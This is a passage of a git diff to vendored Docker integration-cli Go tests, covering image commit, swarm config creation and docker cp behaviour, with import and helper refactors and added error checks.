*check.C) { - out, _ := dockerCmd(c, "run", "-i", "-a", "stdin", "busybox", "echo", "foo") + out := cli.DockerCmd(c, "run", "-i", "-a", "stdin", "busybox", "echo", "foo").Combined() cleanedContainerID := strings.TrimSpace(out) - dockerCmd(c, "wait", cleanedContainerID) + cli.DockerCmd(c, "wait", cleanedContainerID) - out, _ = dockerCmd(c, "commit", cleanedContainerID) + out = cli.DockerCmd(c, "commit", cleanedContainerID).Combined() cleanedImageID := strings.TrimSpace(out) - dockerCmd(c, "inspect", cleanedImageID) + cli.DockerCmd(c, "inspect", cleanedImageID) } func (s *DockerSuite) TestCommitWithoutPause(c *check.C) { @@ -39,7 +41,6 @@ func (s *DockerSuite) TestCommitWithoutPause(c *check.C) { //test commit a paused container should not unpause it after commit func (s *DockerSuite) TestCommitPausedContainer(c *check.C) { testRequires(c, DaemonIsLinux) - defer unpauseAllContainers() out, _ := dockerCmd(c, "run", "-i", "-d", "busybox") cleanedContainerID := strings.TrimSpace(out) @@ -54,9 +55,9 @@ func (s *DockerSuite) TestCommitPausedContainer(c *check.C) { } func (s *DockerSuite) TestCommitNewFile(c *check.C) { - dockerCmd(c, "run", "--name", "commiter", "busybox", "/bin/sh", "-c", "echo koye > /foo") + dockerCmd(c, "run", "--name", "committer", "busybox", "/bin/sh", "-c", "echo koye > /foo") - imageID, _ := dockerCmd(c, "commit", "commiter") + imageID, _ := dockerCmd(c, "commit", "committer") imageID = strings.TrimSpace(imageID) out, _ := dockerCmd(c, "run", imageID, "cat", "/foo") @@ -76,7 +77,7 @@ func (s *DockerSuite) TestCommitHardlink(c *check.C) { imageID, _ := dockerCmd(c, "commit", "hardlinks", "hardlinks") imageID = strings.TrimSpace(imageID) - secondOutput, _ := dockerCmd(c, "run", "-t", "hardlinks", "ls", "-di", "file1", "file2") + secondOutput, _ := dockerCmd(c, "run", "-t", imageID, "ls", "-di", "file1", "file2") chunks = strings.Split(strings.TrimSpace(secondOutput), " ") inode = chunks[0] @@ -90,7 +91,7 @@ func (s *DockerSuite) TestCommitTTY(c *check.C) { imageID, _ := dockerCmd(c, "commit", "tty", "ttytest") imageID = strings.TrimSpace(imageID) - dockerCmd(c, "run", "ttytest", "/bin/ls") + dockerCmd(c, "run", imageID, "/bin/ls") } func (s *DockerSuite) TestCommitWithHostBindMount(c *check.C) { @@ -100,7 +101,7 @@ func (s *DockerSuite) TestCommitWithHostBindMount(c *check.C) { imageID, _ := dockerCmd(c, "commit", "bind-commit", "bindtest") imageID = strings.TrimSpace(imageID) - dockerCmd(c, "run", "bindtest", "true") + dockerCmd(c, "run", imageID, "true") } func (s *DockerSuite) TestCommitChange(c *check.C) { @@ -121,11 +122,21 @@ func (s *DockerSuite) TestCommitChange(c *check.C) { "test", "test-commit") imageID = strings.TrimSpace(imageID) + expectedEnv := "[DEBUG=true test=1 PATH=/foo]" + // bug fixed in 1.36, add min APi >= 1.36 requirement + // PR record https://github.com/moby/moby/pull/35582 + if versions.GreaterThan(testEnv.DaemonAPIVersion(), "1.35") && testEnv.OSType != "windows" { + // The ordering here is due to `PATH` being overridden from the container's + // ENV. On windows, the container doesn't have a `PATH` ENV variable so + // the ordering is the same as the cli. + expectedEnv = "[PATH=/foo DEBUG=true test=1]" + } + prefix, slash := getPrefixAndSlashFromDaemonPlatform() - prefix = strings.ToUpper(prefix) // Force C: as that's how WORKDIR is normalised on Windows + prefix = strings.ToUpper(prefix) // Force C: as that's how WORKDIR is normalized on Windows expected := map[string]string{ "Config.ExposedPorts": "map[8080/tcp:{}]", - "Config.Env": "[DEBUG=true test=1 PATH=/foo]", + "Config.Env": expectedEnv, "Config.Labels": "map[foo:bar]", "Config.Cmd": "[/bin/sh]", "Config.WorkingDir": prefix + slash + "opt", diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_config_create_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_config_create_test.go new file mode 100644 index 0000000000..b823254874 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_config_create_test.go @@ -0,0 +1,131 @@ +// +build !windows + +package main + +import ( + "io/ioutil" + "os" + "strings" + + "github.com/docker/docker/api/types/swarm" + "github.com/docker/docker/integration-cli/checker" + "github.com/go-check/check" +) + +func (s *DockerSwarmSuite) TestConfigCreate(c *check.C) { + d := s.AddDaemon(c, true, true) + + testName := "test_config" + id := d.CreateConfig(c, swarm.ConfigSpec{ + Annotations: swarm.Annotations{ + Name: testName, + }, + Data: []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("configs: %s", id)) + + config := d.GetConfig(c, id) + c.Assert(config.Spec.Name, checker.Equals, testName) +} + +func (s *DockerSwarmSuite) TestConfigCreateWithLabels(c *check.C) { + d := s.AddDaemon(c, true, true) + + testName := "test_config" + id := d.CreateConfig(c, swarm.ConfigSpec{ + Annotations: swarm.Annotations{ + Name: testName, + Labels: map[string]string{ + "key1": "value1", + "key2": "value2", + }, + }, + Data: []byte("TESTINGDATA"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("configs: %s", id)) + + config := d.GetConfig(c, id) + c.Assert(config.Spec.Name, checker.Equals, testName) + c.Assert(len(config.Spec.Labels), checker.Equals, 2) + c.Assert(config.Spec.Labels["key1"], checker.Equals, "value1") + c.Assert(config.Spec.Labels["key2"], checker.Equals, "value2") +} + +// Test case for 28884 +func (s *DockerSwarmSuite) TestConfigCreateResolve(c *check.C) { + d := s.AddDaemon(c, true, true) + + name := "test_config" + id := d.CreateConfig(c, swarm.ConfigSpec{ + Annotations: swarm.Annotations{ + Name: name, + }, + Data: []byte("foo"), + }) + c.Assert(id, checker.Not(checker.Equals), "", check.Commentf("configs: %s", id)) + + fake := d.CreateConfig(c, swarm.ConfigSpec{ + Annotations: swarm.Annotations{ + Name: id, + }, + Data: []byte("fake foo"), + }) + c.Assert(fake, checker.Not(checker.Equals), "", check.Commentf("configs: %s", fake)) + + out, err := d.Cmd("config", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Contains, name) + c.Assert(out, checker.Contains, fake) + + out, err = d.Cmd("config", "rm", id) + c.Assert(out, checker.Contains, id) + + // Fake one will remain + out, err = d.Cmd("config", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), name) + c.Assert(out, checker.Contains, fake) + + // Remove based on name prefix of the fake one + // (which is the same as the ID of foo one) should not work + // as search is only done based on: + // - Full ID + // - Full Name + // - Partial ID (prefix) + out, err = d.Cmd("config", "rm", id[:5]) + c.Assert(out, checker.Not(checker.Contains), id) + out, err = d.Cmd("config", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), name) + c.Assert(out, checker.Contains, fake) + + // Remove based on ID prefix of the fake one should succeed + out, err = d.Cmd("config", "rm", fake[:5]) + c.Assert(out, checker.Contains, fake[:5]) + out, err = d.Cmd("config", "ls") + c.Assert(err, checker.IsNil) + c.Assert(out, checker.Not(checker.Contains), name) + c.Assert(out, checker.Not(checker.Contains), id) + c.Assert(out, checker.Not(checker.Contains), fake) +} + +func (s *DockerSwarmSuite) TestConfigCreateWithFile(c *check.C) { + d := s.AddDaemon(c, true, true) + + testFile, err := ioutil.TempFile("", "configCreateTest") + c.Assert(err, checker.IsNil, check.Commentf("failed to create temporary file")) + defer os.Remove(testFile.Name()) + + testData := "TESTINGDATA" + _, err = testFile.Write([]byte(testData)) + c.Assert(err, checker.IsNil, check.Commentf("failed to write to temporary file")) + + testName := "test_config" + out, err := d.Cmd("config", "create", testName, testFile.Name()) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "", check.Commentf(out)) + + id := strings.TrimSpace(out) + config := d.GetConfig(c, id) + c.Assert(config.Spec.Name, checker.Equals, testName) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_config_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_config_test.go deleted file mode 100644 index 1d5e5ad3db..0000000000 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_config_test.go +++ /dev/null @@ -1,140 +0,0 @@ -package main - -import ( - "io/ioutil" - "net/http" - "net/http/httptest" - "os" - "os/exec" - "path/filepath" - "runtime" - - "github.com/docker/docker/api" - "github.com/docker/docker/dockerversion" - "github.com/docker/docker/pkg/homedir" - "github.com/docker/docker/pkg/integration/checker" - "github.com/go-check/check" -) - -func (s *DockerSuite) TestConfigHTTPHeader(c *check.C) { - testRequires(c, UnixCli) // Can't set/unset HOME on windows right now - // We either need a level of Go that supports Unsetenv (for cases - // when HOME/USERPROFILE isn't set), or we need to be able to use - // os/user but user.Current() only works if we aren't statically compiling - - var headers map[string][]string - - server := httptest.NewServer(http.HandlerFunc( - func(w http.ResponseWriter, r *http.Request) { - w.Header().Set("API-Version", api.DefaultVersion) - headers = r.Header - })) - defer server.Close() - - homeKey := homedir.Key() - homeVal := homedir.Get() - tmpDir, err := ioutil.TempDir("", "fake-home") - c.Assert(err, checker.IsNil) - defer os.RemoveAll(tmpDir) - - dotDocker := filepath.Join(tmpDir, ".docker") - os.Mkdir(dotDocker, 0600) - tmpCfg := filepath.Join(dotDocker, "config.json") - - defer func() { os.Setenv(homeKey, homeVal) }() - os.Setenv(homeKey, tmpDir) - - data := `{ - "HttpHeaders": { "MyHeader": "MyValue" } - }` - - err = ioutil.WriteFile(tmpCfg, []byte(data), 0600) - c.Assert(err, checker.IsNil) - - cmd := exec.Command(dockerBinary, "-H="+server.URL[7:], "ps") - out, _, _ := runCommandWithOutput(cmd) - - c.Assert(headers["User-Agent"], checker.NotNil, check.Commentf("Missing User-Agent")) - - c.Assert(headers["User-Agent"][0], checker.Equals, "Docker-Client/"+dockerversion.Version+" ("+runtime.GOOS+")", check.Commentf("Badly formatted User-Agent,out:%v", out)) - - c.Assert(headers["Myheader"], checker.NotNil) - c.Assert(headers["Myheader"][0], checker.Equals, "MyValue", check.Commentf("Missing/bad header,out:%v", out)) - -} - -func (s *DockerSuite) TestConfigDir(c *check.C) { - cDir, err := ioutil.TempDir("", "fake-home") - c.Assert(err, checker.IsNil) - defer os.RemoveAll(cDir) - - // First make sure pointing to empty dir doesn't generate an error - dockerCmd(c, "--config", cDir, "ps") - - // Test with env var too - cmd := exec.Command(dockerBinary, "ps") - cmd.Env = appendBaseEnv(true, "DOCKER_CONFIG="+cDir) - out, _, err := runCommandWithOutput(cmd) - - c.Assert(err, checker.IsNil, check.Commentf("ps2 didn't work,out:%v", out)) - - // Start a server so we can check to see if the config file was - // loaded properly - var headers map[string][]string - - server := httptest.NewServer(http.HandlerFunc( - func(w http.ResponseWriter, r *http.Request) { - headers = r.Header - })) - defer server.Close() - - // Create a dummy config file in our new config dir - data := `{ - "HttpHeaders": { "MyHeader": "MyValue" } - }` - - tmpCfg := filepath.Join(cDir, "config.json") - err = ioutil.WriteFile(tmpCfg, []byte(data), 0600) - c.Assert(err, checker.IsNil, check.Commentf("Err creating file")) - - env := appendBaseEnv(false) - - cmd = exec.Command(dockerBinary, "--config", cDir, "-H="+server.URL[7:], "ps") - cmd.Env = env - out, _, err = runCommandWithOutput(cmd) - - c.Assert(err, checker.NotNil, check.Commentf("out:%v", out)) - c.Assert(headers["Myheader"], checker.NotNil) - c.Assert(headers["Myheader"][0], checker.Equals, "MyValue", check.Commentf("ps3 - Missing header,out:%v", out)) - - // Reset headers and try again using env var this time - headers = map[string][]string{} - cmd = exec.Command(dockerBinary, "-H="+server.URL[7:], "ps") - cmd.Env = append(env, "DOCKER_CONFIG="+cDir) - out, _, err = runCommandWithOutput(cmd) - - c.Assert(err, checker.NotNil, check.Commentf("%v", out)) - c.Assert(headers["Myheader"], checker.NotNil) - c.Assert(headers["Myheader"][0], checker.Equals, "MyValue", check.Commentf("ps4 - Missing header,out:%v", out)) - - // Reset headers and make sure flag overrides the env var - headers = map[string][]string{} - cmd = exec.Command(dockerBinary, "--config", cDir, "-H="+server.URL[7:], "ps") - cmd.Env = append(env, "DOCKER_CONFIG=MissingDir") - out, _, err = runCommandWithOutput(cmd) - - c.Assert(err, checker.NotNil, check.Commentf("out:%v", out)) - c.Assert(headers["Myheader"], checker.NotNil) - c.Assert(headers["Myheader"][0], checker.Equals, "MyValue", check.Commentf("ps5 - Missing header,out:%v", out)) - - // Reset headers and make sure flag overrides the env var. - // Almost same as previous but make sure the "MissingDir" isn't - // ignore - we don't want to default back to the env var. - headers = map[string][]string{} - cmd = exec.Command(dockerBinary, "--config", "MissingDir", "-H="+server.URL[7:], "ps") - cmd.Env = append(env, "DOCKER_CONFIG="+cDir) - out, _, err = runCommandWithOutput(cmd) - - c.Assert(err, checker.NotNil, check.Commentf("out:%v", out)) - c.Assert(headers["Myheader"], checker.IsNil, check.Commentf("ps6 - Headers shouldn't be the expected value,out:%v", out)) -} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_from_container_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_from_container_test.go index 9ed7e8c720..499be54522 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_from_container_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_from_container_test.go @@ -4,12 +4,10 @@ import ( "os" "path/filepath" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) -// docker cp CONTAINER:PATH LOCALPATH - // Try all of the test cases from the archive package which implements the // internals of `docker cp` and ensure that the behavior matches when actually // copying to and from containers. @@ -20,96 +18,9 @@ import ( // 3. DST parent directory must exist. // 4. If DST exists as a file, it must not end with a trailing separator. -// First get these easy error cases out of the way. - -// Test for error when SRC does not exist. -func (s *DockerSuite) TestCpFromErrSrcNotExists(c *check.C) { - containerID := makeTestContainer(c, testContainerOptions{}) - - tmpDir := getTestDir(c, "test-cp-from-err-src-not-exists") - defer os.RemoveAll(tmpDir) - - err := runDockerCp(c, containerCpPath(containerID, "file1"), tmpDir) - c.Assert(err, checker.NotNil) - - c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err)) -} - -// Test for error when SRC ends in a trailing -// path separator but it exists as a file. -func (s *DockerSuite) TestCpFromErrSrcNotDir(c *check.C) { - testRequires(c, DaemonIsLinux) - containerID := makeTestContainer(c, testContainerOptions{addContent: true}) - - tmpDir := getTestDir(c, "test-cp-from-err-src-not-dir") - defer os.RemoveAll(tmpDir) - - err := runDockerCp(c, containerCpPathTrailingSep(containerID, "file1"), tmpDir) - c.Assert(err, checker.NotNil) - - c.Assert(isCpNotDir(err), checker.True, check.Commentf("expected IsNotDir error, but got %T: %s", err, err)) -} - -// Test for error when SRC is a valid file or directory, -// bu the DST parent directory does not exist. -func (s *DockerSuite) TestCpFromErrDstParentNotExists(c *check.C) { - testRequires(c, DaemonIsLinux) - containerID := makeTestContainer(c, testContainerOptions{addContent: true}) - - tmpDir := getTestDir(c, "test-cp-from-err-dst-parent-not-exists") - defer os.RemoveAll(tmpDir) - - makeTestContentInDir(c, tmpDir) - - // Try with a file source. - srcPath := containerCpPath(containerID, "/file1") - dstPath := cpPath(tmpDir, "notExists", "file1") - - err := runDockerCp(c, srcPath, dstPath) - c.Assert(err, checker.NotNil) - - c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err)) - - // Try with a directory source. - srcPath = containerCpPath(containerID, "/dir1") - - err = runDockerCp(c, srcPath, dstPath) - c.Assert(err, checker.NotNil) - - c.Assert(isCpNotExist(err), checker.True, check.Commentf("expected IsNotExist error, but got %T: %s", err, err)) -} - -// Test for error when DST ends in a trailing -// path separator but exists as a file. -func (s *DockerSuite) TestCpFromErrDstNotDir(c *check.C) { - testRequires(c, DaemonIsLinux) - containerID := makeTestContainer(c, testContainerOptions{addContent: true}) - - tmpDir := getTestDir(c, "test-cp-from-err-dst-not-dir") - defer os.RemoveAll(tmpDir) - - makeTestContentInDir(c, tmpDir) - - // Try with a file source. - srcPath := containerCpPath(containerID, "/file1") - dstPath := cpPathTrailingSep(tmpDir, "file1") - - err := runDockerCp(c, srcPath, dstPath) - c.Assert(err, checker.NotNil) - - c.Assert(isCpNotDir(err), checker.True, check.Commentf("expected IsNotDir error, but got %T: %s", err, err)) - - // Try with a directory source. - srcPath = containerCpPath(containerID, "/dir1") - - err = runDockerCp(c, srcPath, dstPath) - c.Assert(err, checker.NotNil) - - c.Assert(isCpNotDir(err), checker.True, check.Commentf("expected IsNotDir error, but got %T: %s", err, err)) -} - // Check that copying from a container to a local symlink copies to the symlink // target and does not overwrite the local symlink itself. +// TODO: move to docker/cli and/or integration/container/copy_test.go func (s *DockerSuite) TestCpFromSymlinkDestination(c *check.C) { testRequires(c, DaemonIsLinux) containerID := makeTestContainer(c, testContainerOptions{addContent: true}) @@ -124,7 +35,7 @@ func (s *DockerSuite) TestCpFromSymlinkDestination(c *check.C) { srcPath := containerCpPath(containerID, "/file2") dstPath := cpPath(tmpDir, "symlinkToFile1") - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) // The symlink should not have been modified. c.Assert(symlinkTargetEquals(c, dstPath, "file1"), checker.IsNil) @@ -136,7 +47,7 @@ func (s *DockerSuite) TestCpFromSymlinkDestination(c *check.C) { // should copy the file into the symlink target directory. dstPath = cpPath(tmpDir, "symlinkToDir1") - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) // The symlink should not have been modified. c.Assert(symlinkTargetEquals(c, dstPath, "dir1"), checker.IsNil) @@ -149,7 +60,7 @@ func (s *DockerSuite) TestCpFromSymlinkDestination(c *check.C) { // the contents of the source file. dstPath = cpPath(tmpDir, "brokenSymlinkToFileX") - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) // The symlink should not have been modified. c.Assert(symlinkTargetEquals(c, dstPath, "fileX"), checker.IsNil) @@ -163,7 +74,7 @@ func (s *DockerSuite) TestCpFromSymlinkDestination(c *check.C) { srcPath = containerCpPath(containerID, "/dir2") dstPath = cpPath(tmpDir, "symlinkToDir1") - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) // The symlink should not have been modified. c.Assert(symlinkTargetEquals(c, dstPath, "dir1"), checker.IsNil) @@ -177,7 +88,7 @@ func (s *DockerSuite) TestCpFromSymlinkDestination(c *check.C) { // should not modify the symlink. dstPath = cpPath(tmpDir, "brokenSymlinkToDirX") - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) // The symlink should not have been modified. c.Assert(symlinkTargetEquals(c, dstPath, "dirX"), checker.IsNil) @@ -217,7 +128,7 @@ func (s *DockerSuite) TestCpFromCaseA(c *check.C) { srcPath := containerCpPath(containerID, "/root/file1") dstPath := cpPath(tmpDir, "itWorks.txt") - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) c.Assert(fileContentEquals(c, dstPath, "file1\n"), checker.IsNil) } @@ -235,7 +146,7 @@ func (s *DockerSuite) TestCpFromCaseB(c *check.C) { srcPath := containerCpPath(containerID, "/file1") dstDir := cpPathTrailingSep(tmpDir, "testDir") - err := runDockerCp(c, srcPath, dstDir) + err := runDockerCp(c, srcPath, dstDir, nil) c.Assert(err, checker.NotNil) c.Assert(isCpDirNotExist(err), checker.True, check.Commentf("expected DirNotExists error, but got %T: %s", err, err)) @@ -260,7 +171,7 @@ func (s *DockerSuite) TestCpFromCaseC(c *check.C) { // Ensure the local file starts with different content. c.Assert(fileContentEquals(c, dstPath, "file2\n"), checker.IsNil) - c.Assert(runDockerCp(c, srcPath, dstPath), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstPath, nil), checker.IsNil) c.Assert(fileContentEquals(c, dstPath, "file1\n"), checker.IsNil) } @@ -285,7 +196,7 @@ func (s *DockerSuite) TestCpFromCaseD(c *check.C) { _, err := os.Stat(dstPath) c.Assert(os.IsNotExist(err), checker.True, check.Commentf("did not expect dstPath %q to exist", dstPath)) - c.Assert(runDockerCp(c, srcPath, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstDir, nil), checker.IsNil) c.Assert(fileContentEquals(c, dstPath, "file1\n"), checker.IsNil) @@ -299,7 +210,7 @@ func (s *DockerSuite) TestCpFromCaseD(c *check.C) { dstDir = cpPathTrailingSep(tmpDir, "dir1") - c.Assert(runDockerCp(c, srcPath, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcPath, dstDir, nil), checker.IsNil) c.Assert(fileContentEquals(c, dstPath, "file1\n"), checker.IsNil) } @@ -319,7 +230,7 @@ func (s *DockerSuite) TestCpFromCaseE(c *check.C) { dstDir := cpPath(tmpDir, "testDir") dstPath := filepath.Join(dstDir, "file1-1") - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) @@ -330,7 +241,7 @@ func (s *DockerSuite) TestCpFromCaseE(c *check.C) { dstDir = cpPathTrailingSep(tmpDir, "testDir") - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) } @@ -351,7 +262,7 @@ func (s *DockerSuite) TestCpFromCaseF(c *check.C) { srcDir := containerCpPath(containerID, "/root/dir1") dstFile := cpPath(tmpDir, "file1") - err := runDockerCp(c, srcDir, dstFile) + err := runDockerCp(c, srcDir, dstFile, nil) c.Assert(err, checker.NotNil) c.Assert(isCpCannotCopyDir(err), checker.True, check.Commentf("expected ErrCannotCopyDir error, but got %T: %s", err, err)) @@ -376,7 +287,7 @@ func (s *DockerSuite) TestCpFromCaseG(c *check.C) { resultDir := filepath.Join(dstDir, "dir1") dstPath := filepath.Join(resultDir, "file1-1") - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) @@ -390,7 +301,7 @@ func (s *DockerSuite) TestCpFromCaseG(c *check.C) { dstDir = cpPathTrailingSep(tmpDir, "dir2") - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) } @@ -410,7 +321,7 @@ func (s *DockerSuite) TestCpFromCaseH(c *check.C) { dstDir := cpPath(tmpDir, "testDir") dstPath := filepath.Join(dstDir, "file1-1") - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) @@ -421,7 +332,7 @@ func (s *DockerSuite) TestCpFromCaseH(c *check.C) { dstDir = cpPathTrailingSep(tmpDir, "testDir") - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) } @@ -443,7 +354,7 @@ func (s *DockerSuite) TestCpFromCaseI(c *check.C) { srcDir := containerCpPathTrailingSep(containerID, "/root/dir1") + "." dstFile := cpPath(tmpDir, "file1") - err := runDockerCp(c, srcDir, dstFile) + err := runDockerCp(c, srcDir, dstFile, nil) c.Assert(err, checker.NotNil) c.Assert(isCpCannotCopyDir(err), checker.True, check.Commentf("expected ErrCannotCopyDir error, but got %T: %s", err, err)) @@ -468,7 +379,7 @@ func (s *DockerSuite) TestCpFromCaseJ(c *check.C) { dstDir := cpPath(tmpDir, "dir2") dstPath := filepath.Join(dstDir, "file1-1") - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) @@ -482,7 +393,7 @@ func (s *DockerSuite) TestCpFromCaseJ(c *check.C) { dstDir = cpPathTrailingSep(tmpDir, "dir2") - c.Assert(runDockerCp(c, srcDir, dstDir), checker.IsNil) + c.Assert(runDockerCp(c, srcDir, dstDir, nil), checker.IsNil) c.Assert(fileContentEquals(c, dstPath, "file1-1\n"), checker.IsNil) } diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_test.go index 4e5c39e998..ec53712fab 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_test.go @@ -10,9 +10,9 @@ import ( "path/filepath" "strings" - "github.com/docker/docker/pkg/integration/checker" - icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" + "gotest.tools/icmd" ) const ( @@ -27,7 +27,7 @@ const ( // Ensure that an all-local path case returns an error. func (s *DockerSuite) TestCpLocalOnly(c *check.C) { - err := runDockerCp(c, "foo", "bar") + err := runDockerCp(c, "foo", "bar", nil) c.Assert(err, checker.NotNil) c.Assert(err.Error(), checker.Contains, "must specify at least one container source") @@ -379,7 +379,7 @@ func (s *DockerSuite) TestCpSymlinkComponent(c *check.C) { // Check that cp with unprivileged user doesn't return any error func (s *DockerSuite) TestCpUnprivilegedUser(c *check.C) { - testRequires(c, DaemonIsLinux) + testRequires(c, DaemonIsLinux, SameHostDaemon) testRequires(c, UnixCli) // uses chmod/su: not available on windows out, _ := dockerCmd(c, "run", "-d", "busybox", "/bin/sh", "-c", "touch "+cpTestName) @@ -421,7 +421,7 @@ func (s *DockerSuite) TestCpSpecialFiles(c *check.C) { // Copy actual /etc/resolv.conf dockerCmd(c, "cp", containerID+":/etc/resolv.conf", outDir) - expected, err := readContainerFile(containerID, "resolv.conf") + expected := readContainerFile(c, containerID, "resolv.conf") actual, err := ioutil.ReadFile(outDir + "/resolv.conf") // Expected copied file to be duplicate of the container resolvconf @@ -430,7 +430,7 @@ func (s *DockerSuite) TestCpSpecialFiles(c *check.C) { // Copy actual /etc/hosts dockerCmd(c, "cp", containerID+":/etc/hosts", outDir) - expected, err = readContainerFile(containerID, "hosts") + expected = readContainerFile(c, containerID, "hosts") actual, err = ioutil.ReadFile(outDir + "/hosts") // Expected copied file to be duplicate of the container hosts @@ -439,8 +439,9 @@ func (s *DockerSuite) TestCpSpecialFiles(c *check.C) { // Copy actual /etc/resolv.conf dockerCmd(c, "cp", containerID+":/etc/hostname", outDir) - expected, err = readContainerFile(containerID, "hostname") + expected = readContainerFile(c, containerID, "hostname") actual, err = ioutil.ReadFile(outDir + "/hostname") + c.Assert(err, checker.IsNil) // Expected copied file to be duplicate of the container resolvconf c.Assert(bytes.Equal(actual, expected), checker.True) @@ -533,6 +534,7 @@ func (s *DockerSuite) TestCpToDot(c *check.C) { c.Assert(os.Chdir(tmpdir), checker.IsNil) dockerCmd(c, "cp", containerID+":/test", ".") content, err := ioutil.ReadFile("./test") + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Equals, "lololol\n") } @@ -545,7 +547,7 @@ func (s *DockerSuite) TestCpToStdout(c *check.C) { // failed to set up container c.Assert(strings.TrimSpace(out), checker.Equals, "0") - out, _, err := runCommandPipelineWithOutput( + out, err := RunCommandPipelineWithOutput( exec.Command(dockerBinary, "cp", containerID+":/test", "-"), exec.Command("tar", "-vtf", "-")) @@ -571,6 +573,7 @@ func (s *DockerSuite) TestCpNameHasColon(c *check.C) { defer os.RemoveAll(tmpdir) dockerCmd(c, "cp", containerID+":/te:s:t", tmpdir) content, err := ioutil.ReadFile(tmpdir + "/te:s:t") + c.Assert(err, checker.IsNil) c.Assert(string(content), checker.Equals, "lololol\n") } @@ -652,6 +655,7 @@ func (s *DockerSuite) TestCpSymlinkFromConToHostFollowSymlink(c *check.C) { dockerCmd(c, "cp", "-L", cleanedContainerID+":"+"/dir_link", expectedPath) actual, err = ioutil.ReadFile(expectedPath) + c.Assert(err, checker.IsNil) if !bytes.Equal(actual, expected) { c.Fatalf("Expected copied file to be duplicate of the container symbol link target") diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_test.go index f981cb8f8b..77567a3b95 100644 --- a/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_test.go +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_cp_to_container_test.go @@ -3,12 +3,10 @@ package main import ( "os" - "github.com/docker/docker/pkg/integration/checker" + "github.com/docker/docker/integration-cli/checker" "github.com/go-check/check" ) -// docker cp LOCALPATH CONTAINER:PATH - // Try all of the test cases from the archive package which implements the // internals of `docker cp` and ensure that the behavior matches when actually // copying to and from containers. @@ -19,108 +17,6 @@ import ( // 3. DST parent directory must exist. // 4. If DST exists as a file, it must not end with a trailing separator. -// First get these easy error cases out of the way. - -// Test for error when SRC does not exist. -func (s *DockerSuite) TestCpToErrSrcNotExists(c *check.C) { - containerID := makeTestContainer(c, testContainerOptions{}) - - tmpDir := getTestDir(c, "test-cp-to-err-src-not-exists") - defer os.RemoveAll(tmpDir) - - srcPath := cpPath(tmpDir, "file1") - dstPath 